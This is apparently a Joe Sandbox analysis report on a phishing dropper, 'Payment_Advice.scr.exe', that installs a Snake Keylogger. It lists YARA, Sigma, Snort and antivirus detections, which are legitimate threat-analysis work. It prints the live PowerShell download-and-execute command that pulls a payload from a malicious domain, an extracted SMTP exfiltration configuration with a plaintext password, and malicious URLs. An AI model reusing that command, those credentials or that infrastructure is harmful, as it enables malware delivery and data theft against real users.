15.2.hadvices.scr.2a91ca0.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xc9894:$x1: In$J$ct0r 0xcb508:$a1: WriteProcessMemory 0xcb594:$a1: WriteProcessMemory 0xcb668:$a4: VirtualAllocEx 0xcb88c:$a4: VirtualAllocEx 0xcb90c:$a4: VirtualAllocEx 0xe4b4:$s3: net.pipe 0xc9b2c:$s3: net.pipe 0xc9b4c:$s4: vsmacros
0.2.Payment_Advice.scr.exe.2bff588.2.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xf8964:$x1: In$J$ct0r 0xfa678:$a1: WriteProcessMemory 0xfa704:$a1: WriteProcessMemory 0xfa7d8:$a4: VirtualAllocEx 0xfa9fc:$a4: VirtualAllocEx 0xfaa7c:$a4: VirtualAllocEx 0x10cf4:$s3: net.pipe 0xf8c24:$s3: net.pipe 0xf8c44:$s4: vsmacros
15.2.hadvices.scr.2a8f460.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xcc0d4:$x1: In$J$ct0r 0xcdd48:$a1: WriteProcessMemory 0xcddd4:$a1: WriteProcessMemory 0xcdea8:$a4: VirtualAllocEx 0xce0cc:$a4: VirtualAllocEx 0xce14c:$a4: VirtualAllocEx 0x10cf4:$s3: net.pipe 0xcc36c:$s3: net.pipe 0xcc38c:$s4: vsmacros
Click to see the 42 entries

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.scr.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.scr.exe, ParentProcessId: 3164, ParentProcessName: Payment_Advice.scr.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ProcessId: 2720, ProcessName: wscript.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2720, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.scr.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.scr.exe, ParentProcessId: 3164, ParentProcessName: Payment_Advice.scr.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ProcessId: 2720, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.scr.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.scr.exe, ParentProcessId: 3164, ParentProcessName: Payment_Advice.scr.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ProcessId: 2720, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Users\Public\Payment_Advice.pdf

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2720, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Windows\Temp\hadvices.scr

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2720, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Windows\Temp\hadvices.scr

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 108.167.142.65, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Temp\hadvices.scr, Initiated: true, ProcessId: 5648, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49750

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3532, TargetFilename: C:\Windows\Temp\hadvices.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2720, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.scr.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.scr.exe, ParentProcessId: 3164, ParentProcessName: Payment_Advice.scr.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ProcessId: 2720, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2720, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'", ProcessId: 3532, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2792, ProcessName: svchost.exe

Snort Signatures

ET TROJAN Snake Keylogger Exfil via SMTP - Source IP: 192.168.2.6 - Destination IP: 108.167.142.65

Timestamp:	05/01/24-15:18:24.979513
SID:	2044767
Source Port:	49750
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Snake Keylogger Exfil via SMTP - Source IP: 192.168.2.6 - Destination IP: 108.167.142.65

Timestamp:	05/01/24-15:18:37.550574
SID:	2044767
Source Port:	49751
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Snake Keylogger Exfil via SMTP - Source IP: 192.168.2.6 - Destination IP: 108.167.142.65

Timestamp:	05/01/24-15:18:39.976646
SID:	2044767
Source Port:	49752
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://mail.qoldenfrontier.com	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: advising-receipts.com	Virustotal: Detection: 13%	Perma Link
Source: https://advising-receipts.com	Virustotal: Detection: 9%	Perma Link
Source: http://advising-receipts.com	Virustotal: Detection: 13%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 16%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\hadvices.scr	ReversingLabs: Detection: 70%
Source: C:\Windows\Temp\hadvices.scr	Virustotal: Detection: 34%			Perma Link

Multi AV Scanner detection for submitted file

Source: Payment_Advice.scr.exe	Virustotal: Detection: 58%			Perma Link
Source: Payment_Advice.scr.exe	ReversingLabs: Detection: 52%

Machine Learning detection for dropped file

Source: C:\Windows\Temp\hadvices.scr

Joe Sandbox ML: detected

Source: Payment_Advice.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49731 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.27.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.6:49745 version: TLS 1.2

Source: Payment_Advice.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Payment_Advice.scr.exe, 00000000.00000002.2102922301.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Payment_Advice.scr.exe, 00000000.00000002.2102184990.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 0000000F.00000002.2333968723.0000000002A81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \/.dll.pdb source: Payment_Advice.scr.exe, hadvices.scr.4.dr

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 00DDFCD1h	16_2_00DDFA10
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 00DDEFDDh	16_2_00DDEDF0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 00DDF967h	16_2_00DDEDF0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_00DDE310
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_00DDE943
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_00DDEB23
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_00F67550
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_00F680B3
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_00F6793B
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_00F67939
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	16_2_00F67CB2
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 05571011h	16_2_05570D60
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557D411h	16_2_0557D168
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557CFB9h	16_2_0557CD10
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 055715D8h	16_2_05571506
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 05570BB1h	16_2_05570900
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 055715D8h	16_2_055711C0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557D869h	16_2_0557D5C0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 055715D8h	16_2_055711B1
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 055702F1h	16_2_05570040
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557C709h	16_2_0557C460
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557C2B1h	16_2_0557C008
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557F6D1h	16_2_0557F428
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557FB29h	16_2_0557F880
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557CB61h	16_2_0557C8B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 05570751h	16_2_055704A0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557BA01h	16_2_0557B758
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557EE21h	16_2_0557EB78
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557B5A9h	16_2_0557B300
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557E9C9h	16_2_0557E720
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557F279h	16_2_0557EFD0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557BE59h	16_2_0557BBB0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557E119h	16_2_0557DE70
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557DCC1h	16_2_0557DA18
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 0557E571h	16_2_0557E2C8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06658C9Dh	16_2_06658960
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06656921h	16_2_06656678
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 066564C9h	16_2_06656220
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_066536CE
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06656D79h	16_2_06656AD0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 066571D1h	16_2_06656F28
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06657652h	16_2_066573A8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_066533A8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_066533B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 066502E9h	16_2_06650040
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06657F01h	16_2_06657C58
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06657AA9h	16_2_06657800
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06650B99h	16_2_066508F0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06658359h	16_2_066580B0
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06650741h	16_2_06650498
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06655C19h	16_2_06655970
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06650FF1h	16_2_06650D48
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 066587B1h	16_2_06658508
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06656071h	16_2_06655DC8
Source: C:\Windows\Temp\hadvices.scr	Code function: 4x nop then jmp 06655441h	16_2_06655198

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.6:49750 -> 108.167.142.65:587
Source: Traffic	Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.6:49751 -> 108.167.142.65:587
Source: Traffic	Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.6:49752 -> 108.167.142.65:587

Yara detected Generic Downloader

Source: Yara match	File source: Payment_Advice.scr.exe, type: SAMPLE
Source: Yara match	File source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.hadvices.scr.5d0000.0.unpack, type: UNPACKEDPE
